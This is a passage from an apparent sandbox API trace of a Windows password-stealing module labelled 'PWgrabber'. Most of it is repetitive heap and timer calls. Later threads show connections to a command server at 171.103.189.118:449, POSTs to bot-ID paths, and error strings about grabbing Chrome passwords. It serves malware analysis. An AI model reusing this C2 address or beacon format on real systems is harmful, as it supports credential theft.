out: hHeap=0x2150000) returned 1 [0190.617] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0190.617] GetTickCount () returned 0x21990e5 [0190.617] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad26c0 [0190.617] GetTickCount () returned 0x21990e5 [0190.617] GetTickCount () returned 0x21990e5 [0190.617] GetTickCount () returned 0x21990e5 [0190.617] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad26c0 | out: hHeap=0x2150000) returned 1 [0190.617] WaitForSingleObject (hHandle=0x72c, dwMilliseconds=0x0) returned 0x0 [0190.617] GetTickCount () returned 0x21990e5 [0190.617] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad2690 [0190.617] GetTickCount () returned 0x21990e5 [0190.617] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad2690 | out: hHeap=0x2150000) returned 1 [0190.617] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64b30 | out: hHeap=0x2150000) returned 1 [0190.617] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.624] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.654] GetTickCount () returned 0x219999b [0190.654] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64ff0 [0190.654] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0190.654] GetTickCount () returned 0x219999b [0190.654] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad2750 [0190.654] GetTickCount () returned 0x219999b [0190.654] GetTickCount () returned 0x219999b [0190.654] GetTickCount () returned 0x219999b [0190.654] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad2750 | out: hHeap=0x2150000) returned 1 [0190.654] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0190.654] GetTickCount () returned 0x219999b [0190.654] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad27e0 [0190.654] GetTickCount () returned 0x219999b [0190.654] GetTickCount () returned 0x219999b [0190.654] GetTickCount () returned 0x219999b [0190.654] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad27e0 | out: hHeap=0x2150000) returned 1 [0190.655] WaitForSingleObject (hHandle=0x72c, dwMilliseconds=0x0) returned 0x0 [0190.655] GetTickCount () returned 0x219999b [0190.655] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad2b40 [0190.655] GetTickCount () returned 0x219999b [0190.655] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad2b40 | out: hHeap=0x2150000) returned 1 [0190.655] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64ff0 | out: hHeap=0x2150000) returned 1 [0190.655] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.673] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.690] GetTickCount () returned 0x219a260 [0190.690] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e65030 [0190.690] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0190.690] GetTickCount () returned 0x219a260 [0190.690] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad2a20 [0190.690] GetTickCount () returned 0x219a260 [0190.690] GetTickCount () returned 0x219a260 [0190.690] GetTickCount () returned 0x219a260 [0190.690] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad2a20 | out: hHeap=0x2150000) returned 1 [0190.690] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0190.690] GetTickCount () returned 0x219a260 [0190.690] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad2690 [0190.690] GetTickCount () returned 0x219a260 [0190.690] GetTickCount () returned 0x219a260 [0190.690] GetTickCount () returned 0x219a260 [0190.691] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad2690 | out: hHeap=0x2150000) returned 1 [0190.691] WaitForSingleObject (hHandle=0x72c, dwMilliseconds=0x0) returned 0x0 [0190.691] GetTickCount () returned 0x219a260 [0190.691] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad24e0 [0190.691] GetTickCount () returned 0x219a260 [0190.691] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad24e0 | out: hHeap=0x2150000) returned 1 [0190.691] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65030 | out: hHeap=0x2150000) returned 1 [0190.691] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.693] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.716] GetTickCount () returned 0x219ab15 [0190.716] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e650b0 [0190.716] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0190.716] GetTickCount () returned 0x219ab15 [0190.716] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad2030 [0190.716] GetTickCount () returned 0x219ab15 [0190.716] GetTickCount () returned 0x219ab15 [0190.716] GetTickCount () returned 0x219ab15 [0190.717] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad2030 | out: hHeap=0x2150000) returned 1 [0190.717] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0190.717] GetTickCount () returned 0x219ab15 [0190.717] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad2690 [0190.717] GetTickCount () returned 0x219ab15 [0190.717] GetTickCount () returned 0x219ab15 [0190.717] GetTickCount () returned 0x219ab15 [0190.717] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad2690 | out: hHeap=0x2150000) returned 1 [0190.717] WaitForSingleObject (hHandle=0x72c, dwMilliseconds=0x0) returned 0x0 [0190.717] GetTickCount () returned 0x219ab15 [0190.717] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad24e0 [0190.717] GetTickCount () returned 0x219ab15 [0190.717] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad24e0 | out: hHeap=0x2150000) returned 1 [0190.717] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e650b0 | out: hHeap=0x2150000) returned 1 [0190.718] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.724] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.743] GetTickCount () returned 0x219b3ba [0190.743] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64cb0 [0190.743] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0190.743] GetTickCount () returned 0x219b3ba [0190.744] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad2a20 [0190.744] GetTickCount () returned 0x219b3ba [0190.744] GetTickCount () returned 0x219b3ba [0190.744] GetTickCount () returned 0x219b3ba [0190.744] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad2a20 | out: hHeap=0x2150000) returned 1 [0190.744] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0190.744] GetTickCount () returned 0x219b3ba [0190.744] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad24e0 [0190.744] GetTickCount () returned 0x219b3ba [0190.744] GetTickCount () returned 0x219b3ba [0190.744] GetTickCount () returned 0x219b3ba [0190.744] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad24e0 | out: hHeap=0x2150000) returned 1 [0190.744] WaitForSingleObject (hHandle=0x72c, dwMilliseconds=0x0) returned 0x0 [0190.745] GetTickCount () returned 0x219b3ba [0190.745] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad2a20 [0190.745] GetTickCount () returned 0x219b3ba [0190.745] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad2a20 | out: hHeap=0x2150000) returned 1 [0190.745] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64cb0 | out: hHeap=0x2150000) returned 1 [0190.745] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.758] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.771] GetTickCount () returned 0x219bc70 [0190.771] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64ff0 [0190.771] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0190.771] GetTickCount () returned 0x219bc70 [0190.771] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad24e0 [0190.771] GetTickCount () returned 0x219bc70 [0190.771] GetTickCount () returned 0x219bc70 [0190.771] GetTickCount () returned 0x219bc70 [0190.772] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad24e0 | out: hHeap=0x2150000) returned 1 [0190.772] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0190.772] GetTickCount () returned 0x219bc70 [0190.772] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad24e0 [0190.772] GetTickCount () returned 0x219bc70 [0190.772] GetTickCount () returned 0x219bc70 [0190.772] GetTickCount () returned 0x219bc70 [0190.772] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad24e0 | out: hHeap=0x2150000) returned 1 [0190.772] WaitForSingleObject (hHandle=0x72c, dwMilliseconds=0x0) returned 0x0 [0190.772] GetTickCount () returned 0x219bc70 [0190.772] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad24e0 [0190.772] GetTickCount () returned 0x219bc70 [0190.772] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad24e0 | out: hHeap=0x2150000) returned 1 [0190.772] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64ff0 | out: hHeap=0x2150000) returned 1 [0190.773] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.810] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.858] GetTickCount () returned 0x219c554 [0190.859] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e65230 [0190.859] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0190.859] GetTickCount () returned 0x219c554 [0190.859] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad24e0 [0190.859] GetTickCount () returned 0x219c554 [0190.859] GetTickCount () returned 0x219c554 [0190.859] GetTickCount () returned 0x219c554 [0190.859] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad24e0 | out: hHeap=0x2150000) returned 1 [0190.859] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0190.859] GetTickCount () returned 0x219c554 [0190.859] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad2a20 [0190.859] GetTickCount () returned 0x219c554 [0190.859] GetTickCount () returned 0x219c554 [0190.859] GetTickCount () returned 0x219c554 [0190.859] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad2a20 | out: hHeap=0x2150000) returned 1 [0190.859] WaitForSingleObject (hHandle=0x72c, dwMilliseconds=0x0) returned 0x0 [0190.859] GetTickCount () returned 0x219c554 [0190.859] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad2a20 [0190.859] GetTickCount () returned 0x219c554 [0190.859] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad2a20 | out: hHeap=0x2150000) returned 1 [0190.859] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65230 | out: hHeap=0x2150000) returned 1 [0190.859] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.919] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) Thread: id = 7 os_tid = 0xbc4 Thread: id = 8 os_tid = 0x12c0 Thread: id = 9 os_tid = 0x31c Thread: id = 10 os_tid = 0x13dc Thread: id = 11 os_tid = 0x13d8 Thread: id = 95 os_tid = 0x136c [0178.919] WinHttpConnect (hSession=0x71b780, pswzServerName="171.103.189.118", nServerPort=0x1c1, dwReserved=0x0) returned 0x332be210 [0178.919] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c9c0 [0178.924] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PWgrabber build Aug 31 2021 14:49:07", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0178.924] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32747620 [0178.924] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PWgrabber build Aug 31 2021 14:49:07", cchWideChar=-1, lpMultiByteStr=0x32747620, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PWgrabber build Aug 31 2021 14:49:07", lpUsedDefaultChar=0x0) returned 37 [0178.924] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32747660 [0178.924] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e49e40 [0178.924] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cf30 [0178.924] GetTickCount () returned 0xe963fc [0178.925] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x100) returned 0x32e41940 [0178.925] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x90) returned 0x32e42330 [0178.926] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="info", cchWideChar=-1, lpMultiByteStr=0x33b2e750, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="info", lpUsedDefaultChar=0x0) returned 5 [0178.926] WinHttpOpenRequest (hConnect=0x332be210, pwszVerb="POST", pwszObjectName="tot153/XC64ZB_W10010586.FDB33F77971735B3BB3BB3B3B33B3B93/64/pwgrabb/VERS//", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x78e190 [0178.926] WinHttpSetOption (hInternet=0x78e190, dwOption=0x1f, lpBuffer=0x33b2edb8, dwBufferLength=0x4) returned 1 [0178.926] WinHttpSendRequest (hRequest=0x78e190, lpszHeaders="Content-Type: multipart/form-data; boundary=------Boundary00E963FC\r\nContent-Length: 141\r\n\r\n", dwHeadersLength=0xffffffff, lpOptional=0x32e42330*, dwOptionalLength=0x8d, dwTotalLength=0x8d, dwContext=0x0) returned 1 [0180.536] WinHttpReceiveResponse (hRequest=0x78e190, lpReserved=0x0) returned 1 [0180.536] WinHttpQueryHeaders (in: hRequest=0x78e190, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x33b2edb4, lpdwBufferLength=0x33b2edbc, lpdwIndex=0x0 | out: lpBuffer=0x33b2edb4*, lpdwBufferLength=0x33b2edbc*=0x4, lpdwIndex=0x0) returned 1 [0180.536] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32747660 | out: hHeap=0x2150000) returned 1 [0180.537] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e49e40 | out: hHeap=0x2150000) returned 1 [0180.537] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6cf30 | out: hHeap=0x2150000) returned 1 [0180.537] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32747620 | out: hHeap=0x2150000) returned 1 [0180.537] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41940 | out: hHeap=0x2150000) returned 1 [0180.537] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e42330 | out: hHeap=0x2150000) returned 1 [0180.537] Sleep (dwMilliseconds=0xbb8) [0183.663] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41310 | out: hHeap=0x2150000) returned 1 [0183.663] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e49e20 | out: hHeap=0x2150000) returned 1 [0183.663] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6cab0 | out: hHeap=0x2150000) returned 1 [0183.663] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e412d0 | out: hHeap=0x2150000) returned 1 [0183.663] WinHttpCloseHandle (hInternet=0x78e190) returned 1 [0183.663] WinHttpCloseHandle (hInternet=0x332be210) returned 1 [0183.663] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c9c0 | out: hHeap=0x2150000) returned 1 Thread: id = 96 os_tid = 0x520 [0180.131] WinHttpConnect (hSession=0x71b780, pswzServerName="171.103.189.118", nServerPort=0x1c1, dwReserved=0x0) returned 0x332be530 [0180.131] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6f9c0 [0180.131] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Grab_Passwords_Chrome(): Can't open database", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0180.131] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e41a90 [0180.131] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Grab_Passwords_Chrome(): Can't open database", cchWideChar=-1, lpMultiByteStr=0x32e41a90, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Grab_Passwords_Chrome(): Can't open database", lpUsedDefaultChar=0x0) returned 45 [0180.131] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x327476a0 [0180.132] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e49ee0 [0180.132] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6ff00 [0180.132] GetTickCount () returned 0xe968af [0180.132] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x100) returned 0x32e5c8d0 [0180.132] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0xa0) returned 0x32e4fe60 [0180.132] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="info", cchWideChar=-1, lpMultiByteStr=0x33bae750, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="info", lpUsedDefaultChar=0x0) returned 5 [0180.132] WinHttpOpenRequest (hConnect=0x332be530, pwszVerb="POST", pwszObjectName="tot153/XC64ZB_W10010586.FDB33F77971735B3BB3BB3B3B33B3B93/64/pwgrabb/DEBG//", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x332b3560 [0180.132] WinHttpSetOption (hInternet=0x332b3560, dwOption=0x1f, lpBuffer=0x33baedb8, dwBufferLength=0x4) returned 1 [0180.132] WinHttpSendRequest (hRequest=0x332b3560, lpszHeaders="Content-Type: multipart/form-data; boundary=------Boundary00E968AF\r\nContent-Length: 149\r\n\r\n", dwHeadersLength=0xffffffff, lpOptional=0x32e4fe60*, dwOptionalLength=0x95, dwTotalLength=0x95, dwContext=0x0) returned 1 [0181.845] WinHttpReceiveResponse (hRequest=0x332b3560, lpReserved=0x0) returned 1 [0181.845] WinHttpQueryHeaders (in: hRequest=0x332b3560, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x33baedb4, lpdwBufferLength=0x33baedbc, lpdwIndex=0x0 | out: lpBuffer=0x33baedb4*, lpdwBufferLength=0x33baedbc*=0x4, lpdwIndex=0x0) returned 1 [0181.845] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x327476a0 | out: hHeap=0x2150000) returned 1 [0181.845] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e49ee0 | out: hHeap=0x2150000) returned 1 [0181.845] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6ff00 | out: hHeap=0x2150000) returned 1 [0181.845] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41a90 | out: hHeap=0x2150000) returned 1 [0181.845] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e5c8d0 | out: hHeap=0x2150000) returned 1 [0181.846] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e4fe60 | out: hHeap=0x2150000) returned 1 [0181.846] Sleep (dwMilliseconds=0xbb8) [0185.856] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e49ea0 | out: hHeap=0x2150000) returned 1 [0185.856] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e5c9f0 | out: hHeap=0x2150000) returned 1 [0185.856] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e49de0 | out: hHeap=0x2150000) returned 1 [0185.856] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6e160 | out: hHeap=0x2150000) returned 1 [0185.856] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41a50 | out: hHeap=0x2150000) returned 1 [0185.856] WinHttpCloseHandle (hInternet=0x332b3560) returned 1 [0185.856] WinHttpCloseHandle (hInternet=0x332be530) returned 1 [0185.856] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6f9c0 | out: hHeap=0x2150000) returned 1 Thread: id = 97 os_tid = 0xec [0180.160] WinHttpConnect (hSession=0x71b780, pswzServerName="171.103.189.118", nServerPort=0x1c1, dwReserved=0x0) returned 0x332be9e0 [0180.160] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6f9f0 [0180.161] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="unable to open database file", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0180.161] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6fa20 [0180.161] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="unable to open database file", cchWideChar=-1, lpMultiByteStr=0x32e6fa20, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="unable to open database file", lpUsedDefaultChar=0x0) returned 29 [0180.161] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6f510 [0180.161] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x3234bdb0 [0180.161] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6fcf0 [0180.161] GetTickCount () returned 0xe968ce [0180.161] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x100) returned 0x32e50080 [0180.161] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x90) returned 0x3234bf30 [0180.161] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="info", cchWideChar=-1, lpMultiByteStr=0x33c2e750, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="info", lpUsedDefaultChar=0x0) returned 5 [0180.161] WinHttpOpenRequest (hConnect=0x332be9e0, pwszVerb="POST", pwszObjectName="tot153/XC64ZB_W10010586.FDB33F77971735B3BB3BB3B3B33B3B93/64/pwgrabb/DEBG//", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x759490 [0180.161] WinHttpSetOption (hInternet=0x759490, dwOption=0x1f, lpBuffer=0x33c2edb8, dwBufferLength=0x4) returned 1 [0180.161] WinHttpSendRequest (hRequest=0x759490, lpszHeaders="Content-Type: multipart/form-data; boundary=------Boundary00E968CE\r\nContent-Length: 133\r\n\r\n", dwHeadersLength=0xffffffff, lpOptional=0x3234bf30*, dwOptionalLength=0x85, dwTotalLength=0x85, dwContext=0x0) returned 1 [0180.719] WinHttpReceiveResponse (hRequest=0x759490, lpReserved=0x0) returned 1 [0180.719] WinHttpQueryHeaders (in: hRequest=0x759490, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x33c2edb4, lpdwBufferLength=0x33c2edbc, lpdwIndex=0x0 | out: lpBuffer=0x33c2edb4*, lpdwBufferLength=0x33c2edbc*=0x4, lpdwIndex=0x0) returned 1 [0180.719] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6f510 | out: hHeap=0x2150000) returned 1 [0180.719] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x3234bdb0 | out: hHeap=0x2150000) returned 1 [0180.719] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6fcf0 | out: hHeap=0x2150000) returned 1 [0180.719] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6fa20 | out: hHeap=0x2150000) returned 1 [0180.719] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e50080 | out: hHeap=0x2150000) returned 1 [0180.719] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x3234bf30 | out: hHeap=0x2150000) returned 1 [0180.719] Sleep (dwMilliseconds=0xbb8) [0183.824] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e49f80 | out: hHeap=0x2150000) returned 1 [0183.824] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e50030 | out: hHeap=0x2150000) returned 1 [0183.824] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e49f00 | out: hHeap=0x2150000) returned 1 [0183.824] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6f960 | out: hHeap=0x2150000) returned 1 [0183.824] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x327476e0 | out: hHeap=0x2150000) returned 1 [0183.824] WinHttpCloseHandle (hInternet=0x759490) returned 1 [0183.825] WinHttpCloseHandle (hInternet=0x332be9e0) returned 1 [0183.825] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6f9f0 | out: hHeap=0x2150000) returned 1 Thread: id = 98 os_tid = 0xe5c [0180.179] WinHttpConnect (hSession=0x71b780, pswzServerName="171.103.189.118", nServerPort=0x1c1, dwReserved=0x0) returned 0x332bed00 [0180.179] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6fba0 [0180.179] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Failed to grab passwords: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0180.179] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6fe40 [0180.179] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Failed to grab passwords: ", cchWideChar=-1, lpMultiByteStr=0x32e6fe40, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Failed to grab passwords: ", lpUsedDefaultChar=0x0) returned 27 [0180.179] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6f5d0 [0180.179] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x3234bdd0 [0180.179] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6fea0 [0180.180] GetTickCount () returned 0xe968ee [0180.180] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x100) returned 0x32a44010 [0180.180] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x90) returned 0x32a44120 [0180.180] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="info", cchWideChar=-1, lpMultiByteStr=0x33cae750, cbMultiByte=1024, lpDefaultChar=0x0, 